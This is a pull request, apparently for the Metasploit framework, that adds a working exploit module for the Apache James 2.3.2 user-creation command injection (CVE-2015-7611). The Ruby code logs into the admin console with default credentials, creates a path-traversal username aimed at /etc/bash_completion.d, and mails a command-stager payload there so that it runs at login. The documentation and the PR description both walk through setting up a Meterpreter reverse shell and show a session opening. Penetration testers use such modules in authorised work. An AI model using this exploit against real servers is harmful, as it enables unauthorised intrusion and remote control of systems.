### PR TITLE
Add Apache James 2.3.2 Command Injection Exploit Module

### DIFF
--- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md
+++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md
@@ -1,0 +1,77 @@
+## Vulnerable Application  
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:  
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf  
+  
+## Verification Steps  
+  1. Load the module:  
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec  
+```
+
+  2. Set remote and local options:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
+  target => 1  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
+  rhosts => 192.168.224.164  
+  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
+  rport => 25  
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
+  lhost => 192.168.224.167  
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
+  lport => 4444  
+```
+
+  3. Set payload:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
+  payload => linux/x64/meterpreter/reverse_tcp  
+```
+
+  4. Check version and run exploit:  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check  
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit  
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
+```
+
+  5. Set up and run listener (Can be done before running exploit):  
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
+  payload => linux/x64/meterpreter/reverse_tcp  
+  msf5 exploit(multi/handler) > set lport 4444  
+  lport => 4444  
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
+  lhost => 192.168.224.167    
+
+  msf5 exploit(multi/handler) > run  
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444  
+  [*] Sending stage (3021284 bytes) to 192.168.224.164  
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  
+
+  meterpreter >  
+```
+
+## Options  
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
+  **RHOSTS:**  The IP address of the vulnerable server.  
+  **RPORT:**  The port number of the SMTP service.  
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Linux x86  
+  1   Linux x64  
+```
+
+## References  
+  1. <https://www.exploit-db.com/exploits/35513>  
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -1,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
+      'Description'    => %q{
+        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7611'],
+          [ 'EDB', '35513'],
+          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'=> [ 'printf' ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+        ])
+      deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  def check
+    connect
+    banner = sock.get
+    if banner.include? "(JAMES SMTP Server 2.3.2)"
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+
+    sock.get
+
+    sock.puts(username + "\n")
+    sock.get
+
+    sock.puts(password + "\n")
+    sock.get
+
+    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
+    sock.get
+
+    sock.puts("quit\n")
+    disconnect
+
+    connect
+
+    sock.puts("ehlo admin@apache.com\r\n")
+    sock.get
+
+    sock.puts("mail from: <'@apache.com>\r\n")
+    sock.get
+
+    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
+    sock.get
+
+    sock.puts("data\r\n")
+    sock.get
+
+    sock.puts("From: admin@apache.com\r\n")
+    sock.puts("\r\n")
+    sock.puts("'\n")
+    sock.puts("#{cmd}\n")
+    sock.puts("\r\n.\r\n")
+    sock.get
+
+    sock.puts("quit\r\n")
+    sock.get
+
+    disconnect
+  end
+
+  def exploit
+    execute_cmdstager
+  end
+
+end


### PR DESCRIPTION
This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2 (CVE-2015-7611).

## Verification Steps  
  1. Load the module:  
```
  msf5 > use exploit/linux/smtp/apache_james_exec  
```

  2. Set remote and local options:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1  
  target => 1  
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164  
  rhosts => 192.168.224.164  
  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25  
  rport => 25  

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167  
  lhost => 192.168.224.167  
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444  
  lport => 4444  
```

  3. Set payload:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
```

  4. Check version and run exploit:  
```
  msf5 exploit(linux/smtp/apache_james_exec) > check  
  [*] 192.168.224.164:25 - The target appears to be vulnerable.  
  msf5 exploit(linux/smtp/apache_james_exec) > exploit  

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)  
```

  5. Set up and run listener (Can be done before running exploit):  
```
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >  
```

## Options  
  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.  
  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.  
  **RHOSTS:**  The IP address of the vulnerable server.  
  **RPORT:**  The port number of the SMTP service.  

## Targets
```
  Id  Name 
  --  ----
  0   Linux x86  
  1   Linux x64  
```

## References  
  1. <https://www.exploit-db.com/exploits/35513>  
  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>
